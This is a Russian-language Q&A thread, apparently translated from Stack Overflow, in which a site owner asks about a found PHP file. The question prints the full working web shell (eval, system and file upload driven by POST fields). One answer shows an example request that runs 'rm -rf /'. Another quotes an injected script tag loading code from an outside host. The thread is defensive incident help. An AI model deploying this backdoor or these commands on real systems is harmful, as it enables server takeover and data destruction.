Какова цель этого PHP-кода/взлома?
Недавно я нашел 4 необычных файла на моем сервере (которые я не загружал). Имя файла было таким: goog1e7a20543b128921.php
И вот код, который был внутри них:
Goog1e_analist_up<?php [email protected]$_POST['e'];[email protected]$_POST['s'];if($e){eval($e);}if($s){system($s);}if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}?>
Вы знаете, что должен делать этот код..?
Должен ли я начинать паниковать??
Спасибо.
Ответы
Ответ 1
Да, это вредоносный код.
Эта оболочка script позволит выполнять код, а также загружать любой файл, если злоумышленник знает переданные ему параметры.
Я рекомендую искать все файлы для этого кода, проверять права на файл и менять пароли на всякий случай.
Ответ 2
Предложение по борьбе с атакой
Я предлагаю вам использовать HTML-очиститель или OWASP, чтобы сделать многое в безопасности.
Вы должны отключить конструкцию eval
, если вы ее не используете (и не должны, если вам это действительно нужно).
Проанализируйте настройки сервера для любых дыр в безопасности с помощью:
PHPSecInfo
alt text http://phpsec.org/images/psi_ss1.png
Ответ 3
Удалите их прямо сейчас!
Это бэкдор на ваш веб-сервер.
Это позволяет злоумышленникам отправить запрос на http://you.com/goog1e7a20543b128921.php?s=rm -rf /
для удаления всей системы.
Затем вы должны провести тщательный обзор безопасности вашего сайта, чтобы выяснить, как они там попали.
Ответ 4
Для справки:
if($e){eval($e);}
Это позволяет злоумышленнику выполнить любую команду PHP, которую они хотят.
if($s){system($s);}
Это позволяет злоумышленнику выполнить любую системную команду, которую они хотят, как и любой пользователь, на котором работает ваш веб-сервер.
if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}
Это позволяет злоумышленнику загружать любой файл, который им нужен - снова пользователь, который выполняет ваш веб-сервер, определяет права доступа к файлам.
Итак, паника: -p
Я уверен, что в Интернете есть много статей о том, как справиться с этим. Вкратце, создайте резервную копию своей системы для анализа позже, переустановите сервер с нуля (вы не знаете, что еще они сделали с вами, поэтому просто удалить файлы недостаточно.), Пытаясь разобраться, как они вошли и затыкая отверстие.
Ответ 5
eval ($ e) - команда удаленного выполнения
система - экв. для каталога listind
$ _FILES ['f'] ['name'] - для uploand script для инструментов сервера eq hack и т.д.
Ответ 6
По-видимому, вы не единственный из них. googled it real quick, другие сайты также заражены. это выглядит как все время, когда зараженный файл хранится в папке с изображениями.
Ответ 7
Связано: Попробуйте установить phpAntiVirus в будущем и спросите своего провайдера о mod_security. Это может смягчить будущие хаки. В любом случае эти файлы не материализуются сами по себе на вашем сервере. Избавьтесь от всех старых PHP-приложений.
Ответ 8
Ищите это в каждом файле. <script src="http://nt02.co.in/3"></script>
Если вы найдете его с помощью ftp, посмотрите дату, когда файл был изменен, и откройте все файлы, измененные в эту дату, и удалите их.